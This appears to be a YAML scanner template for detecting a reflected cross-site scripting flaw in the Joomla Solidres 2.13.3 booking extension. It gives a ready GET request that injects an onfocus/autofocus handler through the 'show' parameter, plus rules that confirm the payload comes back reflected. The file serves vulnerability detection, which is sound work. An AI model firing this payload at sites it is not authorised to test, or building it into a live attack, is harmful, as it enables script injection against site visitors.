product: Joomla
vName: Joomla Solidres 2.13.3 - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 2
vDesc: Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'.
version: ''
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/51638
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k
    verify:
      logic: and
      check:
        - body:
            value:
              - onfocus="confirm(document.domain)"autofocus
              - com_solidres
            logic: and
        - header:
            value:
              - text/html
            logic: and
        - status: 200
